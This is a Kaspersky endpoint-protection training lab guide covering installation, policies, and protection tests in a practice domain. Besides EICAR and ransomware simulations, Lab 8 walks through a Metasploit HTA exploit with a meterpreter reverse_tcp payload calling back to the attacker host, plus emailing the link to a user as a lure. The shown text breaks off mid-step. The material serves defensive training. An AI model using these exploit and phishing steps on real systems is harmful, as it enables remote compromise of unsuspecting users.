KL 002.11.1 en Labs v2.1.5 PDF

Kaspersky Technical Training
KL 002.11.1
Kaspersky
Endpoint Security
and Management
Lab Guide
Kaspersky Lab
www.kaspersky.com
Table of contents
Lab 1. How to install Kaspersky Security Center ......................................................................................................... 3
Task A: Install the Kaspersky Security Center Administration Server ................................................................... 3
Task B: Install the Web console of Kaspersky Security Center .............................................................................. 7
Task C: Proceed through the Quick Start Wizard to configure Kaspersky Security Center Administration Server
............................................................................................................................................................................. 10
Lab 2. How to deploy Kaspersky Endpoint Security .................................................................................................. 17
Task A: Install Kaspersky Endpoint Security for Windows on a workstation and Kaspersky Security Center
Administration Server .......................................................................................................................................... 18
Task B: Create a standalone installation package for Kaspersky Endpoint Security .......................................... 22
Task C: Install a standalone package of Kaspersky Endpoint Security for Windows on a notebook .................. 24
Task D: Study the results of deploying protection in the network ........................................................................ 25
Lab 3. How to create a structure for the managed computers ..................................................................................... 26
Task A: Create groups for workstations, notebooks, and servers ........................................................................ 26
Task B: Move computers into groups by rules ..................................................................................................... 28
Lab 4. How to test File Threat Protection ................................................................................................................... 34
Make sure that Kaspersky Endpoint Security can detect malicious files that run within Windows Subsystem for
Linux .................................................................................................................................................................... 34
Lab 5. How to configure Mail Threat Protection ........................................................................................................ 36
Task A: Send a message with an executable file .................................................................................................. 36
Task B: Edit the attachment filter ........................................................................................................................ 37
Task C: Make sure that Mail Threat Protection does not edit attachments anymore .......................................... 39
Lab 6. How to test Web Threat Protection.................................................................................................................. 41
Task A: Make sure that Web Threat Protection scans https traffic by default ..................................................... 41
Task B: Turn off encrypted traffic scanning for the PowerShell application ....................................................... 41
Task C: Make sure that Web Threat Protection allows the trusted application PowerShell to download the test
virus over https ..................................................................................................................................................... 43
Lab 7. How to test protection of network folders against ransomware ....................................................................... 44
Task A: Simulate a ransomware infection ............................................................................................................ 44
Task B: Check how the Behavior Detection component reacted on the Tom-Laptop machine ............................ 48
Task C: Allow encryption within network shared folders and configure exclusions for trusted network devices 49
Task D: Make sure that exclusions for trusted network devices work correctly .................................................. 50
Lab 8. How to check health of Exploit Prevention ..................................................................................................... 51
Task A: Simulate a hacker attack by exploiting a vulnerability in PowerShell and get access to a remote computer
............................................................................................................................................................................. 51
Task B: Disable most of the protection components ............................................................................................ 54
Task C: Test protection against exploits .............................................................................................................. 55
Lab 9. How to test protection against fileless threats .................................................................................................. 56
Make sure that AMSI detects fileless threats........................................................................................................ 57
Lab 10. Improve workstations’ protection against ransomware ................................................................................. 58
Task A: Simulate a ransomware infection ............................................................................................................ 58
Task B: Prohibit all programs except for trusted from editing and deleting documents ..................................... 59
Task C: Configure Host Intrusion Prevention events to be stored on the Administration Server ........................ 63
Task D: Simulate encrypting a document and check the result ............................................................................ 66
Lab 11. How to test Network Threat Protection ......................................................................................................... 67
Task A: Imitate a network attack from Kali on Alex-Desktop .............................................................................. 67
Task B: Study the Network attack report ............................................................................................................. 68
Task C: Unblock the Kali computer ..................................................................................................................... 71
Task D: Configure exclusions in the properties of Network Threat Protection ................................................... 73
Task E: Imitate an attack from Kali on Alex-Desktop and study the results ........................................................ 74
L–2 KASPERSKY LAB™
KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1
Lab 12. How to configure exclusions from self-defense ............................................................................................. 75

Task A: Try to interact with Kaspersky Endpoint Security via Windows Remote Assistance ............................... 75
Task B: Allow Windows Remote Assistance to interact with Kaspersky Endpoint Security ................................. 79
Task C: Open the local report of Kaspersky Endpoint Security in a Windows Remote Assistance session ......... 80
Lab 13. How to configure password protection .......................................................................................................... 81
Task A: Find a computer where protection is off ................................................................................................. 81
Task B: Protect Kaspersky Endpoint Security with a password ........................................................................... 82
Task C: Make sure that Kaspersky Endpoint Security is password-protected ..................................................... 85
Task D: Set a password for Network Agent uninstallation................................................................................... 86
Lab 14. How to configure Application Control .......................................................................................................... 88
Task A: Create a category for all web browsers except Internet Explorer .......................................................... 89
Task B: Prohibit the users from starting any browsers except for Internet Explorer........................................... 91
Task C: Start Mozilla Firefox and Internet Explorer ........................................................................................... 93
Lab 15. How to block start of unknown applications in the network .......................................................................... 95
Task A: Create an application category that prohibits starting unknown files .................................................... 95
Task B: Change the policy so as to prohibit all users from starting unknown files ............................................. 98
Task C: Make sure that the settings work correctly ........................................................................................... 100
Lab 16. How to block USB flash drives.................................................................................................................... 102
Task A: Configure blocking USB flash drives .................................................................................................... 102
Task B: Test blocking USB flash drives ............................................................................................................. 105
Task C: Receive a request from the user ............................................................................................................ 106
Lab 17. How to configure granular permissions for USB flash drives ..................................................................... 107
Task A: Prohibit all users from writing files to USB flash drives ...................................................................... 107
Task B: Allow domain users to write files to trusted USB flash drives .............................................................. 110
Lab 18. How to configure web access control .......................................................................................................... 115
Task A: Create a rule to block access to cryptocurrency exchange websites..................................................... 116
Task B: Test whether access to cryptocurrency exchange websites is blocked .................................................. 119
Task C: Consult reports in Kaspersky Security Center ...................................................................................... 120
Lab 19. How to configure Adaptive Anomaly Control ............................................................................................. 121
Task A: Configure blocking macros and scripts in office documents ................................................................. 121
Task B: Make sure that Adaptive Anomaly Control blocks a malicious macro ................................................. 123
Task C: Configure Exploit Prevention to block malicious macros .................................................................... 125
Lab 20. How to configure the dashboard .................................................................................................................. 129
Task A: Add new widgets to the dashboard ........................................................................................................ 130
Task B: Delete and rearrange widgets ............................................................................................................... 132
Lab 21. How to configure maintenance tools............................................................................................................ 134
Task A: Delete unnecessary reports ................................................................................................................... 134
Task B: Create a weekly report about infected computers ................................................................................. 135
Task C: Configure the most important reports to be emailed ............................................................................ 137
Lab 22. How to collect diagnostic information ......................................................................................................... 140
Task A: Collect trace logs from a computer ....................................................................................................... 140
L–3
Lab 1.
How to install Kaspersky Security Center
Lab 1.
Scenario. You need to protect less than 100 computers at ABC Inc. with Kaspersky Endpoint Security for Business. One
Administration Server and the Express edition of Microsoft SQL Server are enough for managing protection within such a
network. Install Kaspersky Security Center Administration Server on a dedicated computer running Windows Server 2016.
Microsoft SQL server has been installed on the virtual machine beforehand.
Contents. In this lab, we will:
1. Install the Kaspersky Security Center Administration Server

2. Install the Web console of Kaspersky Security Center
3. Proceed through the Quick Start Wizard to configure Kaspersky Security Center Administration Server
Task A: Install the Kaspersky Security Center Administration Server
Install Kaspersky Security Center Administration Server with the default settings.
The task is performed on Security-Center.

The DC computer must be turned on.
1. Start the Kaspersky Security Center installer (it is on the

desktop)
2. On the welcome page of the wizard, click Next
3. On the following page, make sure that the required version of

.NET Framework is installed and click Next
4. Accept the License Agreement and the Privacy Policy

5. Click Next
6. Select the Standard installation type and click Next
7. Clear the checkbox Install Kaspersky Security Center 11

Web Console. We will install the web console later using its
own installation wizard
L–5
Lab 1.
8. Keep the option Fewer than 100 networked devices selected

and click Next
9. Select Microsoft SQL Server and click Next
10. Click Browse

11. Select the SECURITY-CENTER\SQLEXPRESS server and

click OK
12. To proceed with the installation of Kaspersky Security

Center, click Next
13. Select Microsoft Windows Authentication Mode and click

Next
L–7
Lab 1.
14. To start the installation, click Install
15. Do not select to start the Administration Console and click

Finish to close the wizard
Task B: Install the Web console of Kaspersky Security Center
Kaspersky Security Center 11 features a new management Web Console. It is implemented as an independent component that
has a separate distribution.

The DC computer must be turned on.
16. Start the Kaspersky Security Center Web Console installer (ask
the instructor where the distribution is located)
17. Select a language for the installation wizard
18. On the welcome page of the wizard, click Next
19. Accept the License Agreement and click Next
20. Do not change the destination folder

21. Click Next
22. Specify the connection address: 127.0.0.1

23. Do not change the port
24. Click Test
L–9
Lab 1.
25. Make sure that port 8080 is accessible at 127.0.0.1

26. Click OK and Next
27. Leave these settings unchanged

28. Click Next
29. Select the option Generate new certificate

30. Click Next
31. Make sure that SECURITY-CENTER is specified in the list

of trusted Administration Servers
32. Click Next to proceed with the installation
33. To start the installation, click Install
34. Close the Kaspersky Security Center 11 Web Console Setup

Wizard: Click Finish
Task C: Proceed through the Quick Start Wizard to configure Kaspersky

Security Center Administration Server
Connect to the Administration Server using Kaspersky Security Center Web Console and proceed through the Quick Start
Wizard. Add an activation code. Configure notifications to [email protected] via SMTP server 10.28.0.10. Accept the
KSN agreement. Download signature updates. Do not start the Remote Installation Wizard. Enable automatic distribution for
the license.
L–11
Lab 1.

The DC, Alex-Desktop, and Tom-Laptop machines must be powered on.
35. Start the Google

Chrome browser. In the
address bar, type
https://127.0.0.1:8080
36. Click Advanced
37. Click the link Proceed
to 127.0.0.1 (unsafe)
38. Enter the username

abc\administrator and
password Ka5per5Ky
39. Click the Login button
40. Skip the tutorial. Click

X to close it
41. On the welcome page of

the wizard, click Next
42. We will not use a proxy

server. Click Next
43. Do not wait for the

wizard to download
updates, click Next
L–13
Lab 1.
44. To activate the

application, select Add
activation code
45. Ask the trainer where to
find the activation code
46. Enter the activation
code in the field
47. Click Send
48. Make sure that 3 keys

have been added to the
repository
49. Click Next
50. Click Add to install the

management plugin of
Kaspersky Endpoint
Security 11.1
51. Select the English KSC

Web Console Plug-in
for KES Windows
52. Click Install Plug-in
53. Make sure that the

plugin of Kaspersky
Endpoint Security 11.1
has been successfully
added to the list
54. Click OK
L–15
Lab 1.
55. Click Next
56. Accept the KSN

statement: Select I
agree to use Kaspersky
Security Network and
click Next
57. Click Create

58. Wait for the Quick Start
Wizard to create prime
policies and tasks
59. If the Network poll

page appears, click
Next
60. Specify the addressee

for email notifications:
In the Email address
box, enter
[email protected],
and for the SMTP
server, type 10.28.0.10
61. Click the button Send
test message to check
whether the settings are
correct
62. Make sure that there is
no error message and
click Next
63. Clear the Start

Protection Deployment
Wizard check box and
click Finish
L–17
Lab 2.
How to deploy Kaspersky Endpoint Security
64. Switch to Operations |

Licensing
65. Select the key for
workstations and
servers
66. Click the license name
to open the key
properties
67. Select to Deploy key

automatically
68. Click Save
Conclusion
You installed the Administration Server, Kaspersky Security Center Web Console, and plugin for Kaspersky Endpoint
Security. Also, you completed the Quick Start Wizard: Created the default tasks and policies, accepted the KSN agreement,
configured notifications for the administrator, and enabled autodistribution for the key.
Further labs will teach you how to install Kaspersky Endpoint Security and Network Agent.
Lab 2.
Scenario. You need to install Kaspersky Endpoint Security on the network computers. You have installed the Kaspersky
Security Center Administration Server already. Now, use the Remote Installation Wizard to install Kaspersky Endpoint
Security and Network Agent on the computers discovered by the Administration Server.
1. Install Kaspersky Endpoint Security for Windows on a workstation and Kaspersky Security Center Administration
Server
2. Install Kaspersky Endpoint Security for Windows using a standalone package on a notebook
3. Study the installation results
Task A: Install Kaspersky Endpoint Security for Windows on a workstation

and Kaspersky Security Center Administration Server
Run the Remote Installation Wizard and select the Kaspersky Endpoint Security package. To be able to access the computers,
specify the domain administrator account ABC\Administrator and password Ka5per5Ky. Leave the other settings unchanged.
Wait for the task to install the applications. If the task prompts you to restart a computer, act as a user and restart it.

1. Switch to Discovery &

Deployment
2. On the Deployment &
Assignment drop-down
menu, select Protection
Deployment Wizard
3. Select Kaspersky
Endpoint Security for
Windows (11.0.0) in
the list of installation
packages
4. Click Next
5. Select Do not add key

to installation package
6. Click Next
7. Select Kaspersky
Security Center 11
Network Agent
8. Click Next
L–19
Lab 2.
9. Choose Select devices

for installation
10. Expand the Managed
devices list. Find and
select the Security
Center computer
11. Expand the Unassigned
devices list. Find and
select the Alex-Desktop
computer
12. Without changing the

package copying
parameters, click Next
13. Click Next without

changing the restart
parameters
14. Agree to uninstall

incompatible
applications and click
Next
15. Select to move

computers to the
Managed devices
group after the
installation and click
Next
16. To specify the name and

password of an
administrator, select
Account required
(installation without
Network Agent)
17. To specify an account,
click Add
18. Type the

abc\administrator
username, Ka5per5Ky
password, and click OK

abc\administrator
account has been added
and click Next
L–21
Lab 2.
20. Select the check box

Run the task when the
Wizard completes
21. Click OK
22. Open the Devices |

Tasks tab
23. Select the Remote
installation of
Kaspersky Endpoint
Security for Windows
task
24. To consult its progress,
click Result
25. Make sure that the task

is running on two
computers
26. Wait for the notification
that the computers have
to be restarted to
complete the task
successfully
27. Switch to Alex-Desktop

28. Log on to the abc\Alex account, password Ka5per5Ky
29. Restart the computer: Click the Restart button in the message
window
30. After it boots, log on to the abc\Alex account with the
password Ka5per5Ky
31. To complete the Kaspersky Endpoint Security installation on

the Security-Center server, restart the machine.
32. When the computer starts again, log on to the
abc\Administrator account with the password Ka5per5Ky
Task B: Create a standalone installation package for Kaspersky Endpoint

Security
Open the list of installation packages. Select the Kaspersky Endpoint Security package. Start the standalone package creation
wizard. Add the Network Agent to the installation package and select the group into which the target computers are to be
moved after the installation.
33. Log on to the

abc\Administrator
account with the
password Ka5per5Ky
34. Run the MMC
Administration Console
35. Expand the Advanced |
Remote installation
node
36. Select the Installation
packages node
37. Select the installation
package Kaspersky
Endpoint Security for
Windows (11.1.0)
38. In the right pane, click
the link Create stand-
alone installation
package
L–23
Lab 2.
39. Agree to install Kaspersky Security Center 11 Network

Agent together with Kaspersky Endpoint Security: Click
Next
40. Agree to move protected computers to the Managed devices

group: Click Next
41. Wait for the wizard to create the package

42. Pay attention to the package file path, you will need it in the
next task. Click Next
43. Click Finish to close the wizard
Task C: Install a standalone package of Kaspersky Endpoint Security for

Windows on a notebook
From the client computer, open the KLSHARE folder on the Administration Server. Find and run the standalone package.
The task is performed on Tom-Laptop.
The DC, Security-Center, and Alex-Desktop machines must be powered on.
44. On the Tom-Laptop machine, start Windows

Explorer
45. Open the shared folder \\security-
center\klshare\PkgInst\
46. Open the folder of the standalone package that

you created in the first task
47. Copy the installer.exe file to the desktop and
start it
48. In the User Account Control window, confirm
running the file with administrative privileges:
Click Yes
L–25
Lab 2.
49. Start the installation: Click the respective button
50. Wait for the installation to complete and click

Close to exit the results window
Task D: Study the results of deploying protection in the network
Study the results of the installation task. Make sure that the computers have been moved to the Managed devices group. Make
sure that Network Agent 11 and Kaspersky Endpoint Security 11.1 are installed on the computers.

51. Open Kaspersky

Security Center Web
Console
52. Switch to the
Monitoring &
Reporting | Reports
tab
53. Find the Deployment

reports
54. Select the Kaspersky
Lab software version
report
55. Click Show report
56. Make sure that it

displays three instances
of Kaspersky Endpoint
Security and three
instances of Network
Agent, exactly the same
number as there are
network computers
57. Close the report
Conclusion
You have installed Kaspersky Endpoint Security and Network Agent using the remote installation wizard and a standalone
package.
If an antivirus by another manufacturer is installed on a computer, the installer will uninstall it and prompt to restart the
machine.
If a firewall is running on a computer or you haven’t specified an account that has administrative permissions on the target
machines, the installation will return an error.
Lab 3.
How to create a structure for the managed
computers
Scenario. You have installed protection on the network computers and you want to configure it optimally. Assuming that
servers, desktops, and laptops need different settings, create respective groups for them and move the computers there. To save
effort in hand-moving the computers into their appropriate groups, create relocation rules and configure conditions based on
the operating systems and network parameters of the computers.
1. Create groups for workstations, notebooks, and servers

2. Move computers into the groups using rules
Task A: Create groups for workstations, notebooks, and servers
Create Servers and Workstations subgroups in the Managed devices container. Then create Desktops and Laptops
subgroups within the Workstations group.
L–27
Lab 3.
How to create a structure for the managed computers

1. Open the Devices | Edit

groups tab
2. Select the group
Managed devices
3. To create a subgroup,
click Add
4. Type Servers for the

group name and click
Add
5. Select the Managed

devices group
6. To create a subgroup,
click Add
7. Create another subgroup

named Workstations
8. Select the
Workstations group
and click Add
9. Type Desktops for the

group name
10. Repeat steps 8,9 to

create the Laptops
group
Task B: Move computers into groups by rules
Open the list of rules in the properties of the Unassigned devices node. Create a rule for all computers. It will work
permanently and move servers to the Servers group. Use the Network agent is running condition and the Operating system
version condition with the Windows Server 2012 R2 and Windows Server 2016 values. You can find both conditions on the
Applications tab.
Create similar rules that will move computers to the Desktops and Laptops groups respectively. Instead of the Operating
system version, use the IP Range condition available on the Network tab. For desktop computers, specify range 10.28.0.100–
10.28.0.199; and for notebooks, 10.28.0.200–10.28.0.254.

L–29
Lab 3.
11. Switch to Discovery &

Deployment
12. On the Deployment &
Assignment drop-down
menu, select Moving
rules
13. Click Add
14. Type Servers for the

rule name
15. Specify the destination
group: On the drop-
down list, select the
Managed devices |
Servers subgroup
16. Select the Rule applied
continuously option
17. To apply the rule to all
computers, clear the
checkbox Move only
devices that do not
belong to an
administration group
18. Select the Enable rule
check box
19. Open the Rule

conditions tab
20. Switch to the
Applications tab
21. Specify that the
Network Agent is
installed: On the
respective drop-down
list, select Yes
22. Apply the rule to
computers with server
operating systems:
Enable the Operating
system version
parameter
23. Scroll the list to the
bottom and switch to
the second page
24. Under Operating

system version, select
Microsoft Windows
2012 R2 and Microsoft
Windows Server 2016
25. To save the rule, click
Save
26. Click Add to create a

rule for desktops
L–31
Lab 3.
27. Type Desktops for the

rule name
group: On the drop-
Managed devices |
Workstations |
Desktops subgroup
continuously option
30. To apply the rule to all
computers, clear the
checkbox Move only
devices that do not
belong to an
check box
32. Open the Rule

conditions tab
33. Configure conditions
for IP addresses: Switch
to the Network tab
34. Apply the rule to the
computers whose
addresses belong to a
specific interval: Select
the IP range check box
35. Specify IP range
10.28.0.100—
10.28.0.199
36. Switch to the

Applications tab
Network Agent is
installed: On the
list, select Yes
Save

rule for notebooks
40. Type Laptops for the

rule name
group: On the drop-
Managed devices |
Workstations |
Laptops subgroup
continuously option
43. Clear the check box
Move only devices that
do not belong to an
check box
45. Open the Rule

conditions tab
46. Switch to the Network
tab
47. Select the IP range
check box
48. Specify IP range
10.28.0.200—
10.28.0.254
L–33
Lab 3.
49. Switch to the

Applications tab
Network Agent is
installed: On the
list, select Yes
Save
52. Make sure that there are

five relocation rules in
the list: Two have been
created automatically
for installation
packages, and three by
you
53. Click Devices |

Managed devices
54. Click Devices | Groups
55. (Optional) Pin the group
structure
56. On the group structure
tree, expand Security
Center | Managed
devices and select
Servers
57. Open the properties of

the Security-Center
device

Security-Center
computer, which is
running Windows
Server 2016 operating
system, has been
automatically moved to
the Servers group
59. In a similar manner,

make sure that the other
computers have been
moved to their
respective groups
Conclusion
You installed protection and organized the computers into groups. The default settings are optimized for an average user of
Kaspersky Endpoint Security. They reliably protect computers, and minimize the performance impact. You can adjust the
protection-comfort balance as necessary: Reinforce protection in some aspects, and maybe make concessions in some others
aiming to improve the user experience. Further labs will explain how to fine-tune the protection settings.
Lab 4.
How to test File Threat Protection
Scenario. You installed Kaspersky Endpoint Security on the network computers. By default, Kaspersky Endpoint Security
supports Windows Subsystem for Linux: It is a compatibility layer for running Linux applications in the latest versions of
Microsoft Windows. In our environment, Windows Subsystem for Linux is based on Ubuntu Linux 14.04. The administrator is
to start a test malicious file in Windows Subsystem for Linux and make sure that Kaspersky Endpoint Security 11.1 detects and
deletes it.
1. Make sure that Kaspersky Endpoint Security can detect malicious files that run within Windows Subsystem for Linux
2. Consult the File Threat Protection events
Make sure that Kaspersky Endpoint Security can detect malicious files that
run within Windows Subsystem for Linux
In this task, we will try to compile a loader for eicar.com within Windows Subsystem for Linux that is running under
Windows 10.
L–35
Lab 4.
How to test File Threat Protection

The DC and Security-Center machines must be powered on.
1. Press WIN+R
2. Type wsl
3. Click OK
4. Copy the eicar dropper’s source code to the /tmp: folder

cp /mnt/c/temp/eicar_drop_kl_edu.cpp /tmp/
5. Go to the /tmp: directory

cd /tmp/
6. Compile the eicar dropper using the g++ compiler:

g++ eicar_drop_kl_edu.cpp -o eicar_dropper
7. Run the compiled eicar dropper:

./eicar_dropper
8. Click Kaspersky Endpoint Security

icon in the notification area or on the
Start menu to open Kaspersky
Endpoint Security interface
9. Click Reports in the lower-left
corner
10. Select the File Threat Protection

report
11. Find the threat detection event
12. Find the results of processing this
threat
Conclusion
This lab demonstrates how Kaspersky Endpoint Security can detect malicious files that are saved or created within Windows
Subsystem for Linux.
Lab 5.
How to configure Mail Threat Protection
Scenario. Your network computers are protected with Kaspersky Endpoint Security. When an administrator emails an
executable file to a user who is to run it and thus solve an issue, Kaspersky Endpoint Security renames the attachment. To save
time and avoid explaining the users how to rename them back, configure Mail Threat Protection not to rename files. At the
same time, criminals often use files with double extension to trick users into running a malicious executable disguised as a
document.
Contents. In this lab, configure Mail Threat Protection not to rename attached *.exe files, but rename files with double
extension *.pdf.exe.
1. Send a message with an executable file

2. Edit the attachment filter
3. Make sure that Mail Threat Protection does not edit attachments anymore
Task A: Send a message with an executable file
Send a message to [email protected] with a zipped *.pdf.exe file attached. Receive the message and make sure that Mail Threat
Protection has changed the extension of the archived file.
L–37
Lab 5.
The task is performed on Alex-Desktop.

1. Begin the task on Alex-Desktop.

2. Create a new message:
— Specify the addressee. In the To: field, type
[email protected]
— In the Subject: box, type Weekly report
— Attach the Document1.zip file to the
message (ask the trainer where it is located)
3. Click Send to dispatch the message
Switch to Tom-Laptop
4. Run Microsoft
Outlook. Select the
received message
5. Save the
Document1.zip file to
the desktop
6. Unpack the Document1.zip archive (select the

Extract all command on the file’s shortcut
menu)
7. Note that the archived file is named
Document1.pdf.ex_. Mail Threat Protection has
changed the extension of the archived executable
file
Task B: Edit the attachment filter
In Kaspersky Endpoint Security policy, edit the list of attachment formats that Mail Threat Protection deletes.

8. Open Kaspersky
Security Center Web
Console
9. Go to Devices | Policies
& Profiles
10. Open the policy
Kaspersky Endpoint
(11.1.0)
11. Switch to the

Application Settings
tab
12. Open the Essential
Threat Protection
section
13. Open the Mail Threat
Protection settings
14. Reconfigure attachment

filtering. Choose Delete
attachments of
selected types
L–39
Lab 5.
15. Scroll the list of settings

down
16. Disable processing
*.exe
17. Create a new attachment

filter: Click Add
18. In the Extension field,
type *.pdf.exe
19. Click OK

*.pdf.exe attachment
filter is displayed in the
list
21. Click OK
22. Click Save to save the
policy
23. Wait for the policy to be
enforced
Task C: Make sure that Mail Threat Protection does not edit attachments
anymore

The DC, Security-Center, and Tom-Laptop machines must be powered on.
24. On the Alex-Desktop machine, create another message. Attach the

Procmon.zip file (ask the instructor where this file is located)
25. In the Subject: box, type IT Service Desk
26. Click Send
27. Open Microsoft

Outlook
28. Save the Procmon.zip
file to the desktop
29. Unpack the Procmon.zip archive (select the

Extract all command on the file’s shortcut menu)
30. Note that in the new message, the archived file is
named Procmon.exe; Mail Threat Protection has
not renamed it
Conclusion
You have configured Mail Threat Protection not to rename .exe files.
If the network is being attacked through email by a new virus that has not yet been added to either signature database or KSN,
configure Mail Threat Protection to rename or delete all executable attachments.
L–41
Lab 6.
How to test Web Threat Protection
Lab 6.
Scenario. Kaspersky Endpoint Security can scan https traffic under the default settings. It replaces the certificate for this
purpose, which sometimes may affect banking and other software that uses a certificate of its own. To avoid interaction issues,
Kaspersky Endpoint Security permits excluding encrypted traffic from scanning.
1. Make sure that Web Threat Protection scans https traffic under the default settings
2. Turn off encrypted traffic scanning for the PowerShell application
3. Make sure that Web Threat Protection allows the trusted application PowerShell to download the test virus over https
Task A: Make sure that Web Threat Protection scans https traffic by default
Run PowerShell, try to download the eicar_com.zip file, and check how Kaspersky Endpoint Security will react.

1. Press WIN+R
2. Type powershell
3. Click OK
4. Download the eicar_com.zip file via PowerShell over https. Carry out the following command:
Invoke-WebRequest –uri “https://secure.eicar.org/eicar_com.zip” -OutFile
“C:\temp\eicar_com.zip”
5. Make sure that Kaspersky Endpoint Security has blocked the download. Do not close the PowerShell window
Task B: Turn off encrypted traffic scanning for the PowerShell application
Add PowerShell to the list of trusted applications, try to download the eicar_com.zip file, and check how Kaspersky Endpoint
Security will react.

The DC and Tom-Laptop machines must be powered on.
6. Open Kaspersky Security

Center Web Console
& Profiles
8. Open the policy
Kaspersky Endpoint
(11.1.0)
9. Switch to the Application

Settings tab
10. Open the General
Settings section
11. Open Exclusions
12. To add a trusted

application, click the link
Trusted applications in
the lower-left corner of
the window
13. Click Add

L–43
Lab 6.
14. For the application path,

type
%systemroot%\system32\
WindowsPowershell\v1.0\
powershell.exe
15. Clear the following
checkboxes:
Do not scan opened files
Do not inherit
restrictions of the parent
process (application)
16. Select
Do not scan network
traffic | Encrypted
traffic only
17. Click OK three times to
save the exclusion

policy
19. Confirm that you want to
use the specified settings:
Click Yes
enforced
Task C: Make sure that Web Threat Protection allows the trusted application
PowerShell to download the test virus over https
Download the eicar_com.zip file from the www.eicar.org website through the PowerShell application once again. Make sure
that Web Threat Protection will not block the test virus if it is downloaded via a trusted application.

The machines DC and Security-Center must be powered on.
21. Download eicar_com.zip over the https secure protocol one more time. Carry out the following command:
Invoke-WebRequest –uri https://secure.eicar.org/eicar_com.zip -OutFile
“C:\temp\eicar_com.zip”
22. To make sure that the file has been

saved successfully, open the C:\temp\
directory
23. Close the PowerShell window
Conclusion
This lab demonstrates how to add an application to the trust list and prevent scanning its encrypted traffic.
The option Do not scan network traffic configured for trusted programs applies to the Mail Threat Protection, Web Threat
Protection, and Web Control components, and does not influence the Firewall or Network Threat Protection.
Lab 7.
How to test protection of network folders
against ransomware
Scenario. Your network computers are protected with Kaspersky Endpoint Security and managed via Kaspersky Security
Center. Of all threats, you are most concerned about ransomware that encrypts data in shared folders. If Kaspersky Endpoint
Security fails to detect a new malware version one day, the company will lose much money. You want to use the Behavior
Detection protection component to counter ransomware.
1. Simulate a ransomware infection

2. Check how the Behavior Detection protection component reacted
3. Allow encryption within network shared folders and configure exclusions for network devices
4. Make sure that exclusions for network devices work correctly
Task A: Simulate a ransomware infection
Find the ransomware2.bat script on the desktop of the Alex-Desktop computer and run it. It imitates ransomware: Encrypts
files in shared network folders and deletes the originals.
Make sure that Kaspersky Endpoint Security 11.1 restored the invoice.txt file and the Alex user cannot modify files in the
network shared folder anymore.
L–45
Lab 7.
How to test protection of network folders against ransomware


Center Web Console
& Profiles
3. Open the policy
Kaspersky Endpoint
(11.1.0)
4. Switch to the Application

Settings tab
5. In Advanced Threat
Protection, select Host
Intrusion Prevention
6. Disable Host Intrusion

Prevention
7. Click OK
8. In Essential Threat
Protection, select
Firewall
9. Disable the Firewall

10. Click OK
11. Save the settings: Click

Save
12. Confirm that you want to
use the specified settings:
Click Yes
enforced
14. !Restart the Tom-
Laptop computer
Switch to the Alex-Desktop machine.

L–47
Lab 7.
15. Open the shared folder \\tom-laptop\temp

16. Make sure that the invoice.txt file is there
17. Find the ransomware2.bat file on the desktop. It

imitates actions of file encrypting ransomware
18. Run the ransomware2.bat file
19. Consult the contents of the folder \\tom-

laptop\temp
20. Open the invoice.txt.aes file in Notepad

21. Make sure that the invoice.txt.aes file is
encrypted
22. Close Notepad
23. Refresh the contents of the folder \\tom-

laptop\temp
24. Make sure that the invoice.txt file has been
recreated
Sometimes, the original file is not deleted
because Behavior Detection blocks the remote
connection as soon as detects remote encryption,
before the script deletes the original file.
25. Try to delete the encrypted file

26. Make sure that access is denied
Task B: Check how the Behavior Detection component reacted on the Tom-
Laptop machine
Consult the report of the Behavior Detection protection component on Tom-Laptop. Note the actions that the protection
component performed.

27. Log on to the abc\Tom

account, password
Ka5per5Ky
28. Open Kaspersky Endpoint
Security interface
29. Open the application
reports
30. Select Behavior Detection
malicious encryption
activity attempted from IP
10.28.0.100 was blocked

C:\temp\invoice.txt file
was restored
L–49
Lab 7.
Task C: Allow encryption within network shared folders and configure

exclusions for trusted network devices
In some cases, Behavior Detection may consider operations performed by design engineering applications as crypto-
ransomware activities. To prevent false positives, we recommend that you add computers to trusted. Select the Administration
Server and edit the Kaspersky Endpoint Security policy. Add the IP address of the Alex-Desktop computer to the list of
exclusions of the Behavior Detection component.

33. Open Kaspersky

Security Center Web
Console
& Profiles
35. Open the policy
Kaspersky Endpoint
(11.1.0)
36. Switch to the

tab
Protection, select
Behavior Detection
38. Reconfigure protection

of shared folders against
external encryption:
Switch the action from
Block connection to
Inform
39. To create an exclusion,
click Add
40. Create an exclusion.

Type the IP address of
the Alex-Desktop
workstation
(10.28.0.100)
41. Click OK twice
42. Save the changes to the
policy
Task D: Make sure that exclusions for trusted network devices work
correctly
43. On the Alex-Desktop machine, log off and on again
44. Open the folder \\tom-laptop\temp\

45. Delete the file invoice.txt.aes
46. Find the ransomware2.bat file on the desktop

47. Run the ransomware2.bat file
48. Make sure that the invoice.txt file has been

encrypted and the original invoice.txt file has not
been restored
49. Delete the file invoice.txt.aes
50. Make sure that the file has been deleted correctly
Conclusion
In this lab, we demonstrated that Kaspersky Endpoint Security can detect malicious ransomware activity with the default
settings. The Behavior Detection component takes care of that.
If necessary, the administrator can always specify exclusions for the protection component and allow specific network devices
to encrypt files in shared folders.
L–51
Lab 8.
How to check health of Exploit Prevention
Lab 8.
Scenario. Criminals can exploit vulnerabilities much easier than one would imagine. With such a powerful tool as Metasploit
Framework, a criminal can create an exploit and send it to unsuspecting company employees.
1. Simulate a hacker attack by exploiting a vulnerability in PowerShell and get access to a remote computer
2. Enable protection against exploits
Task A: Simulate a hacker attack by exploiting a vulnerability in PowerShell

and get access to a remote computer
On the Kali computer, run the Metasploit Framework penetration utility. Attack HTA (HTML Application) via PowerShell.

The DC, Security-Center, Alex-Desktop, and Kali machines must be powered on.
1. Exit Kaspersky Endpoint Security: Right-click its icon in the notification area
and on the shortcut menu, select Exit
Switch to the Kali computer.
2. Log on to the root account. Password—Ka5per5Ky

3. Open a Terminal window
4. Start the Metasploit Framework console. Carry out the following command:
msfconsole
5. Select the exploit template. Carry out the following command:

use exploit/windows/misc/hta_server
You can use the TAB key to autocomplete commands
6. Display the list of applications vulnerable to this exploit. Carry out the following command:
show targets
7. Select to attack PowerShell x64. Carry out the following command:

set target 1
8. Specify the malicious payload. Carry out

set PAYLOAD windows/x64/meterpreter/reverse_tcp
9. Specify the address of the listening server (address of the Kali computer). Carry out the following command:
set LHOST 10.28.0.50
10. Activate the exploit. Carry out

exploit -j
11. Copy the link (right-click, Copy Link) http://10.28.0.50:8080/<name of the generated file>.hta from the Terminal to
the clipboard
12. Open a new terminal instance

13. Start Mozilla Thunderbird. In the terminal, type
thunderbird

— Specify the addressee. In the To: box, type [email protected]
— In the Subject: box, type Report
— Paste the link from the clipboard (http://10.28.0.50/<name of
the generated file>.hta) to the message body
